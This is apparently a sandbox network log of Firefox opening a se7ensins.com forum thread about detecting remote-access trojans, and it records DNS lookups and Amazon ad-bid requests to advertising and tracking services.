accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: content-type
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers
DNS

ids.ad.gt

firefox.exe

Remote address:

8.8.8.8:53

Request

ids.ad.gt

IN A

Response

ids.ad.gt

IN CNAME

ids.ad.gt.cdn.cloudflare.net

ids.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69

ids.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234

ids.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69
DNS

secure.adnxs.com

firefox.exe

Remote address:

8.8.8.8:53

Request

secure.adnxs.com

IN A

Response

secure.adnxs.com

IN CNAME

xandr-g-geo.trafficmanager.net

xandr-g-geo.trafficmanager.net

IN CNAME

ib.anycast.adnxs.com

ib.anycast.adnxs.com

IN A

185.89.210.82

ib.anycast.adnxs.com

IN A

185.89.210.244

ib.anycast.adnxs.com

IN A

185.89.210.20

ib.anycast.adnxs.com

IN A

185.89.210.212

ib.anycast.adnxs.com

IN A

185.89.210.153

ib.anycast.adnxs.com

IN A

185.89.211.84

ib.anycast.adnxs.com

IN A

185.89.210.46

ib.anycast.adnxs.com

IN A

185.89.210.180

ib.anycast.adnxs.com

IN A

185.89.211.116

ib.anycast.adnxs.com

IN A

185.89.210.122

ib.anycast.adnxs.com

IN A

185.89.210.90

ib.anycast.adnxs.com

IN A

185.89.210.141
DNS

ids.ad.gt.cdn.cloudflare.net

firefox.exe

Remote address:

8.8.8.8:53

Request

ids.ad.gt.cdn.cloudflare.net

IN A

Response

ids.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69

ids.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234

ids.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69
DNS

ib.anycast.adnxs.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ib.anycast.adnxs.com

IN A

Response

ib.anycast.adnxs.com

IN A

185.89.210.20

ib.anycast.adnxs.com

IN A

185.89.210.141

ib.anycast.adnxs.com

IN A

185.89.211.84

ib.anycast.adnxs.com

IN A

185.89.211.116

ib.anycast.adnxs.com

IN A

185.89.210.46

ib.anycast.adnxs.com

IN A

185.89.210.212

ib.anycast.adnxs.com

IN A

185.89.210.180

ib.anycast.adnxs.com

IN A

185.89.210.82

ib.anycast.adnxs.com

IN A

185.89.210.122

ib.anycast.adnxs.com

IN A

185.89.210.153

ib.anycast.adnxs.com

IN A

185.89.210.244

ib.anycast.adnxs.com

IN A

185.89.210.90
DNS

image2.pubmatic.com

firefox.exe

Remote address:

8.8.8.8:53

Request

image2.pubmatic.com

IN A

Response

image2.pubmatic.com

IN CNAME

image2v2.pubmnet.com

image2v2.pubmnet.com

IN CNAME

pug-ams-bc.pubmnet.com

pug-ams-bc.pubmnet.com

IN A

198.47.127.205
DNS

token.rubiconproject.com

firefox.exe

Remote address:

8.8.8.8:53

Request

token.rubiconproject.com

IN A

Response

token.rubiconproject.com

IN CNAME

pixel.rubiconproject.net.akadns.net

pixel.rubiconproject.net.akadns.net

IN A

69.173.156.148

pixel.rubiconproject.net.akadns.net

IN A

69.173.156.149
DNS

cm.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

cm.g.doubleclick.net

IN A

Response

cm.g.doubleclick.net

IN A

142.250.200.2
DNS

ids.ad.gt.cdn.cloudflare.net

firefox.exe

Remote address:

8.8.8.8:53

Request

ids.ad.gt.cdn.cloudflare.net

IN AAAA

Response

ids.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::ac43:17ea

ids.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:445

ids.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:545
DNS

ib.anycast.adnxs.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ib.anycast.adnxs.com

IN AAAA

Response
DNS

pug-ams-bc.pubmnet.com

firefox.exe

Remote address:

8.8.8.8:53

Request

pug-ams-bc.pubmnet.com

IN A

Response

pug-ams-bc.pubmnet.com

IN A

198.47.127.205
DNS

cm.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

cm.g.doubleclick.net

IN A

Response

cm.g.doubleclick.net

IN A

142.250.179.226
DNS

pixel.rubiconproject.net.akadns.net

firefox.exe

Remote address:

8.8.8.8:53

Request

pixel.rubiconproject.net.akadns.net

IN A

Response

pixel.rubiconproject.net.akadns.net

IN A

69.173.156.149

pixel.rubiconproject.net.akadns.net

IN A

69.173.156.148
DNS

pug-ams-bc.pubmnet.com

firefox.exe

Remote address:

8.8.8.8:53

Request

pug-ams-bc.pubmnet.com

IN AAAA

Response
DNS

cm.g.doubleclick.net

firefox.exe

Remote address:

8.8.8.8:53

Request

cm.g.doubleclick.net

IN AAAA

Response
DNS

pixel.rubiconproject.net.akadns.net

firefox.exe

Remote address:

8.8.8.8:53

Request

pixel.rubiconproject.net.akadns.net

IN AAAA

Response
DNS

ad.360yield.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ad.360yield.com

IN A

Response

ad.360yield.com

IN CNAME

ice.360yield.com

ice.360yield.com

IN CNAME

euw-ice.360yield.com

euw-ice.360yield.com

IN A

52.48.62.133

euw-ice.360yield.com

IN A

54.74.233.226

euw-ice.360yield.com

IN A

52.209.247.91

euw-ice.360yield.com

IN A

52.51.146.36

euw-ice.360yield.com

IN A

52.213.95.172

euw-ice.360yield.com

IN A

52.208.202.34

euw-ice.360yield.com

IN A

52.18.168.73

euw-ice.360yield.com

IN A

34.250.191.7
DNS

sync.go.sonobi.com

firefox.exe

Remote address:

8.8.8.8:53

Request

sync.go.sonobi.com

IN A

Response

sync.go.sonobi.com

IN CNAME

iad-2-sync.go.sonobi.com

iad-2-sync.go.sonobi.com

IN A

69.166.1.66

iad-2-sync.go.sonobi.com

IN A

69.166.1.67

iad-2-sync.go.sonobi.com

IN A

69.166.1.35

iad-2-sync.go.sonobi.com

IN A

69.166.1.34
DNS

u.openx.net

firefox.exe

Remote address:

8.8.8.8:53

Request

u.openx.net

IN A

Response

u.openx.net

IN A

35.244.159.8

u.openx.net

IN A

34.98.64.218
DNS

p.ad.gt

firefox.exe

Remote address:

8.8.8.8:53

Request

p.ad.gt

IN A

Response

p.ad.gt

IN CNAME

p.ad.gt.cdn.cloudflare.net

p.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69

p.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234

p.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69
DNS

euw-ice.360yield.com

firefox.exe

Remote address:

8.8.8.8:53

Request

euw-ice.360yield.com

IN A

Response

euw-ice.360yield.com

IN A

54.155.206.189

euw-ice.360yield.com

IN A

34.250.191.7

euw-ice.360yield.com

IN A

52.212.132.56

euw-ice.360yield.com

IN A

54.74.233.226

euw-ice.360yield.com

IN A

52.48.62.133

euw-ice.360yield.com

IN A

52.210.157.137

euw-ice.360yield.com

IN A

52.48.59.220

euw-ice.360yield.com

IN A

52.48.56.87
DNS

u.openx.net

firefox.exe

Remote address:

8.8.8.8:53

Request

u.openx.net

IN A

Response

u.openx.net

IN A

34.98.64.218

u.openx.net

IN A

35.244.159.8
DNS

iad-2-sync.go.sonobi.com

firefox.exe

Remote address:

8.8.8.8:53

Request

iad-2-sync.go.sonobi.com

IN A

Response

iad-2-sync.go.sonobi.com

IN A

69.166.1.67

iad-2-sync.go.sonobi.com

IN A

69.166.1.66

iad-2-sync.go.sonobi.com

IN A

69.166.1.35

iad-2-sync.go.sonobi.com

IN A

69.166.1.34
GET

https://aax.amazon-adsystem.com/e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=0&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22se7ensins_970x90_728x90_320x50_Sticky%22%2C%22s%22%3A%5B%221x1%22%2C%22300x50%22%2C%22320x50%22%2C%22468x60%22%2C%22728x90%22%2C%22970x90%22%2C%22300x100%22%2C%22320x100%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_970x90_728x90_320x50_Sticky%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&_c=1

firefox.exe

Remote address:

3.162.148.221:443

Request

GET /e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=0&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22se7ensins_970x90_728x90_320x50_Sticky%22%2C%22s%22%3A%5B%221x1%22%2C%22300x50%22%2C%22320x50%22%2C%22468x60%22%2C%22728x90%22%2C%22970x90%22%2C%22300x100%22%2C%22320x100%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_970x90_728x90_320x50_Sticky%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&_c=1 HTTP/2.0
host: aax.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
content-length: 2289
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
timing-allow-origin: *
date: Sun, 26 May 2024 02:06:28 GMT
server: Server
x-cache: Miss from cloudfront
via: 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: ndahjG8moystcn0CcoIhWsk02dT_GY6UiZ-gSafz7HiBKKJClW2d4w==
GET

https://aax.amazon-adsystem.com/e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=1&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22se7ensins_970x250_970x90_728x90_320x100_320x50_ATF%22%2C%22s%22%3A%5B%22468x60%22%2C%22728x90%22%2C%22970x90%22%2C%22300x250%22%2C%22970x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_970x250_970x90_728x90_320x100_320x50_ATF%22%7D%2C%7B%22sd%22%3A%22se7ensins_300x250_320x100_320x50_incontent%22%2C%22s%22%3A%5B%22300x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_300x250_320x100_320x50_incontent%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&_c=1

firefox.exe

Remote address:

3.162.148.221:443

Request

GET /e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=1&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22se7ensins_970x250_970x90_728x90_320x100_320x50_ATF%22%2C%22s%22%3A%5B%22468x60%22%2C%22728x90%22%2C%22970x90%22%2C%22300x250%22%2C%22970x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_970x250_970x90_728x90_320x100_320x50_ATF%22%7D%2C%7B%22sd%22%3A%22se7ensins_300x250_320x100_320x50_incontent%22%2C%22s%22%3A%5B%22300x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_300x250_320x100_320x50_incontent%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&_c=1 HTTP/2.0
host: aax.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
content-length: 2661
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
timing-allow-origin: *
date: Sun, 26 May 2024 02:06:27 GMT
server: Server
x-cache: Miss from cloudfront
via: 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: B0OT573oY2WefY75qZ0NEI8zVsaBKUiIBdnG6ej00uslF8xt2wUZtg==
GET

https://aax.amazon-adsystem.com/e/dtb/bid?src=600&u=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&pr=https%3A%2F%2Fwww.google.com%2F&pid=xmqDhsTCqJPBC&cb=2&ws=1280x552&v=24.506.1519&t=543&slots=%5B%7B%22sd%22%3A%22browsi_adContainer_ai_0_ati_1_rc_0%22%2C%22s%22%3A%5B%22300x250%22%5D%2C%22sn%22%3A%22%2F15184186%2C2150491%2Fse7ensins_300x250_320x100_320x50_incontent%22%7D%5D&schain=1.0%2C1%21freestar.com%2C405%2C1%2C%2C%2C&sm=56e4f7ed-9634-4870-a3c9-f93d95366c2a&pubid=0ab198dd-b265-462a-ae36-74e163ad6159&gdpre=1&gdprc=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdprl=%7B%22status%22%3A%22tcfv2-success%22%7D&vm=%7B%22ids%22%3A%7B%22audigent%22%3A%22%257B%2522id%2522%253A%257B%2522hadronId%2522%253A%25220001yum0eabfdiledfja6b687lg8falbdjeell6ekeabackkc2jl%2522%257D%257D%22%2C%22id5%22%3A%22ID5*NQlRTNx5ZAOqP9LwA08SRcb8Mr7g4fEqc01CjXERBsSiBZ8tjCSWgJ-p-RSuQIqIodhIfg7Ia1JeC8s91KiYAaHJ1hOpW0boy51YONBr1jOh_BQOsbSLXytHAYBhLKF7od0OoZ_NbUtIj-xihNMF9qHtT5rjlhxelqvFrRUfFhejTj2EwoWIH32-rRGt8SHAog8u3wwyYUaDV24frJbb0w%22%2C%22pubcommon%22%3A%22a56c6a5c-fb27-451e-90d1-520be70f2f04%22%7D%7D&_c=1

firefox.exe

